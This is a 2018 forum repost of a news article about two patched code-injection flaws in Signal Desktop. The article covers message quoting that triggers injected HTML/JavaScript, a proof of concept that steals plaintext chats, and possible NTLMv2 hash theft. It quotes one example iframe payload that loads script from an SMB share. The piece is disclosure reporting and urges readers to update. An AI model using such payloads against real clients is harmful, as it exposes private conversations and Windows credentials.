Rocksolid Light

Welcome to Rocksolid Light

mail  files  register  newsreader  groups  login

Message-ID:  

Always leave room to add an explanation if it doesn't work out.

computers / Security / Bug in Signal

SubjectAuthor
o Bug in SignalGuest

1
Bug in Signal

<pdn90h$kd4$1@def3.retrobbs.com>

  copy mid

https://news.novabbs.org/computers/article-flat.php?id=320&group=rocksolid.shared.security#320

  copy link   Newsgroups: rocksolid.shared.security
Path: rocksolid2!def3!.POSTED!not-for-mail
From: guest@retrobbs.rocksolidbbs.com (Guest)
Newsgroups: rocksolid.shared.security
Subject: Bug in Signal
Date: Fri, 18 May 2018 15:19:46 -0400
Organization: Dancing elephants
Lines: 119
Message-ID: <pdn90h$kd4$1@def3.retrobbs.com>
Reply-To: Guest <guest@retrobbs.rocksolidbbs.com>
NNTP-Posting-Host: def2.lan
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8; format=flowed
Content-Transfer-Encoding: 8bit
X-Trace: def3.retrobbs.com 1526671185 20900 192.168.1.235 (18 May 2018 19:19:45 GMT)
X-Complaints-To: usenet@def3.retrobbs.com
NNTP-Posting-Date: Fri, 18 May 2018 19:19:45 +0000 (UTC)
User-Agent: FUDforum 3.0.7
X-FUDforum: e2245c1d60cd2fa7de3270a53d877d47 <1528>
 by: Guest - Fri, 18 May 2018 19:19 UTC

https://thehackernews.com/2018/05/signal-desktop-hacking.htm
l

Another severe flaw in Signal desktop app lets hackers steal
your chats in plaintext
Wednesday, May 16, 2018 Swati Khandelwal

For the second time in less than a week, users of the
popular end-to-end encrypted Signal messaging app have to
update their desktop applications once again to patch
another severe code injection vulnerability.

Discovered Monday by the same team of security researchers,
the newly discovered vulnerability poses the same threat as
the previous one, allowing remote attackers to inject
malicious code on the recipients' Signal desktop app just by
sending them a message--without requiring any user
interaction.

To understand more about the first code injection
vulnerability (CVE-2018-10994), you can read our previous
article covering how researchers find the Signal flaw and
how it works.

The only difference between the two is that the previous
flaw resides in the function that handles links shared in
the chat, whereas the new vulnerability (CVE-2018-11101)
exists in a different function that handles the validation
of quoted messages, i.e., quoting a previous message in a
reply.
signal-code-execution-flaw
In other words, to exploit the newly patched bug on
vulnerable versions of Signal desktop app, all an attacker
needs to do is send a malicious HTML/javascript code as a
message to the victim, and then quote/reply to that same
message with any random text.

If the victim receives this quoted message containing the
malicious payload on its vulnerable Signal desktop app, it
will automatically execute the payload, without requiring
any user interaction.

Exploiting Signal Code Injection to Steal Plaintext Chats

Until now the proof-of-concept payloads used to demonstrate
code injection vulnerabilities in Signal were limited to
embedding an HTML iFrame, or image/video/audio tags onto the
victim's desktop app.

However, researchers have now managed to craft a new PoC
exploit that could allow remote attackers to successfully
steal all Signal conversations of the victims in the
plaintext just by sending them a message.

This hack literally defeats the purpose of an end-to-end
encrypted messaging app, allowing remote attackers to easily
get the hold on users' plain-text conversations without
breaking the encryption.

Attackers Could Possibly Steal Windows Password As Well

What's worse?

In their blog post, the researchers also indicated that an
attacker could even include files from a remote SMB share
using an HTML iFrame, which can be abused to steal NTLMv2
hashed password for Windows users.

"In the Windows operative system, the CSP fails to
prevent remote inclusion of resources via the SMB protocol.
In this case, remote execution of JavaScript can be achieved
by referencing the script in an SMB share as the source of
an iframe tag, for example: <iframe
src=\\DESKTOP-XXXXX\Temp\test.html> and then replying to
it," the researchers explain.

Though they haven't claimed anything about this form of
attack, I speculate that if an attacker can exploit code
injection to force Windows OS to initiate an automatic
authentication with the attacker-controlled SMB server using
single sign-on, it would eventually hand over victim's
username, and NTLMv2 hashed password to the attackers,
potentially allowing them to gain access to the victim's
system.

We have seen how the same attack technique was recently
exploited using a vulnerability in Microsoft Outlook,
disclosed last month.

I can not verify this claim at this moment, but we are in
contact with few security researchers to confirm this.

Researchers--Iván Ariel Barrera Oro, Alfredo Ortega,
Juliano Rizzo, and Matt Bryant--responsibly reported the
vulnerability to Signal, and its developers have patched the
vulnerability with the release of Signal desktop version
1.11.0 for Windows, macOS, and Linux users.

However, The Hacker News has learned that Signal developers
had already identified this issue as part of a comprehensive
fix to the first vulnerability before the researchers found
it and reported them.

Signal app has an auto-update mechanism, so most users must
have the update already installed. You can read this guide
to ensure if you are running updated version of Signal.

And if you don't, you should immediately update your Signal
for desktop as soon as possible, since now the vulnerability
poses a severe risk of getting your secret conversations
exposed in plaintext to attackers and further severe
consequences.

Technical Writer, Security Blogger and IT Analyst. She is a
Technology Enthusiast with a keen eye on the Cyberspace and
other tech related developments.

Posted on: def2.i2p

1
server_pubkey.txt

rocksolid light 0.9.8
clearnet tor